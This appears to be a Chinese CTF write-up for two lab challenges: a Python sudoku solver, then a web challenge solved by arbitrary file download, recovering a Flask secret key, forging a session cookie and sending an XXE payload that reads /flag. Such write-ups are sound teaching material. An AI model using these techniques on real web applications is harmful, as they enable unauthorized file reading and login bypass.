sudoku_easy
不会用pwntools,那就手做,先写个python解数独脚本:
# 定义数独题目
board_str = '''706002008
005076429
009458016
900800105
807190630
300700000
002601900
610230500
400080201'''
board = [[int(ch) for ch in row] for row in board_str.split("\n")]
def print_board(board):
"""
输出数独题目或解答的函数
"""
for i in range(9):
for j in range(9):
print(board[i][j], end="")
print()
print()
def solve_sudoku(board):
"""
解数独的函数
"""
for i in range(9):
for j in range(9):
if board[i][j] == 0:
for num in range(1, 10):
if is_valid(board, i, j, num):
board[i][j] = num
if solve_sudoku(board):
return True
else:
board[i][j] = 0
return False
return True
def is_valid(board, row, col, num):
"""
判断填入数字是否合法的函数
"""
for i in range(9):
if board[row][i] == num or board[i][col] == num:
return False
start_row = (row // 3) * 3
start_col = (col // 3) * 3
for i in range(start_row, start_row+3):
for j in range(start_col, start_col+3):
if board[i][j] == num:
return False
return True
print("数独题目:")
print_board(board)
solve_sudoku(board)
print("数独解答:")
print_board(board)
照着解就可以了, 分数够了以后就可以命令执行
CarelessPy
F12看到提示说有/eval、/login两个路由,我们可以在/eval路由下查看目录下文件名字,发现文件/app/__pycache__/part.cpython-311.pyc,在图片下载出存在任意文件下载查看文件内容获得secret_key
o2takuXX_donot_like_ntr
利用secret_key构造session登录:
eyJpc2xvZ2luIjp0cnVlfQ.ZIQfSQ.zgCTwfjszZe_Hf7GafSBjuE0iD8
该路由下只有个XML样式的报错,怀疑是XXE漏洞,构造XML读取flag:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "file:///flag">]>
<result>
<ctf>&xxe;</ctf><web>&xxe;</web>
</result>
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至1004454362@qq.com